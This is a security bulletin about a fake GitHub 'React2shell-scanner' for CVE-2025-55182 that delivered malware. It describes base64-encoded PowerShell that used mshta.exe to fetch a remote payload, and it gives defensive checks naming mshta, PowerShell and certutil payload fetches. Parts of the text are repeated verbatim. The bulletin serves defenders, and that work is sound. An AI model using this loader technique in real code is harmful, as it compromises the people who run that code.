GitHub Scanner for React2Shell (CVE-2025-55182) Turns Out to Be Malware
Summary:
A malicious GitHub repository named "React2shell-scanner," hosted by the user "niha0wa," was recently identified as a delivery vehicle for malware rather than a legitimate security tool. Marketed as a scanner for CVE-2025-55182 (React2Shell), the project, uncovered by cybersecurity researcher Saurabh, targeted cybersecurity researchers and professionals investigating the vulnerability in their organization’s environment. Analysis of the script react2shellpy[.]py revealed base64-encoded strings that decoded into PowerShell commands. These commands leveraged mshta.exe to execute a remote payload from the domain py-installer[.]cc. Although GitHub has since removed the repository following reports from the research community, the incident highlights that threat actors will weaponize the trust inherent in the security community, especially regarding a widespread vulnerability, to compromise the workstations of privileged users.
Security Officer Comments:
This campaign underscores a shift where threat actors increasingly leverage the "researcher-to-researcher" community relationship for targeting in order to gain access to high-value environments. By masquerading as a utility for a specific, trending CVE, the attackers have a better chance at bypassing traditional skepticism. Threat Intelligence leads should view this as a reminder to employees that the GitHub brand provides no inherent security guarantee. Researchers should watch for the emergence of fake scanning tools for popular exploits, analyzing them for obfuscated code. Although the repository has been removed, forks are likely to circulate, and security professionals should remain vigilant for this kind of opportunistic threat.
Suggested Corrections:
https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/
A malicious GitHub repository named "React2shell-scanner," hosted by the user "niha0wa," was recently identified as a delivery vehicle for malware rather than a legitimate security tool. Marketed as a scanner for CVE-2025-55182 (React2Shell), the project, uncovered by cybersecurity researcher Saurabh, targeted cybersecurity researchers and professionals investigating the vulnerability in their organization’s environment. Analysis of the script react2shellpy[.]py revealed base64-encoded strings that decoded into PowerShell commands. These commands leveraged mshta.exe to execute a remote payload from the domain py-installer[.]cc. Although GitHub has since removed the repository following reports from the research community, the incident highlights that threat actors will weaponize the trust inherent in the security community, especially regarding a widespread vulnerability, to compromise the workstations of privileged users.
Security Officer Comments:
This campaign underscores a shift where threat actors increasingly leverage the "researcher-to-researcher" community relationship for targeting in order to gain access to high-value environments. By masquerading as a utility for a specific, trending CVE, the attackers have a better chance at bypassing traditional skepticism. Threat Intelligence leads should view this as a reminder to employees that the GitHub brand provides no inherent security guarantee. Researchers should watch for the emergence of fake scanning tools for popular exploits, analyzing them for obfuscated code. Although the repository has been removed, forks are likely to circulate, and security professionals should remain vigilant for this kind of opportunistic threat.
Suggested Corrections:
- Mandatory Sandboxing: Never execute third-party scripts or "scanners" from GitHub on a primary workstation. Use isolated virtual machines (VMs) or disposable containers with no access to the internal network.
- Static Code Analysis: Before execution, manually review source code for "Living off the Land" (LotL) binaries. Specifically, look for calls to mshta.exe, powershell.exe, or certutil.exe used to fetch remote payloads.
- Author Verification: Prioritize tools from known, reputable security organizations or established researchers. Be skeptical of "new" accounts (like niha0wa) created shortly after a CVE disclosure.
- Check for Obfuscation: Treat any use of Base64 encoding, hex-encoded strings, or Unicode obfuscation within a scanning script as a high-confidence indicator of malicious intent.
- Pin by Commit SHA: If integrating third-party actions or utilities into CI/CD pipelines, pin them to a specific commit SHA rather than a mutable tag (e.g., v1.0) to prevent "bait-and-switch" updates.
- Audit Internal Forks: Ensure that internal teams have not forked the malicious React2shell-scanner repository before its removal, as cached or forked copies may still be active.
- Immediate Patching: Ensure all production React/Next.js environments are updated to at least v19.2.1 (for React) or the latest hardened releases.
https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/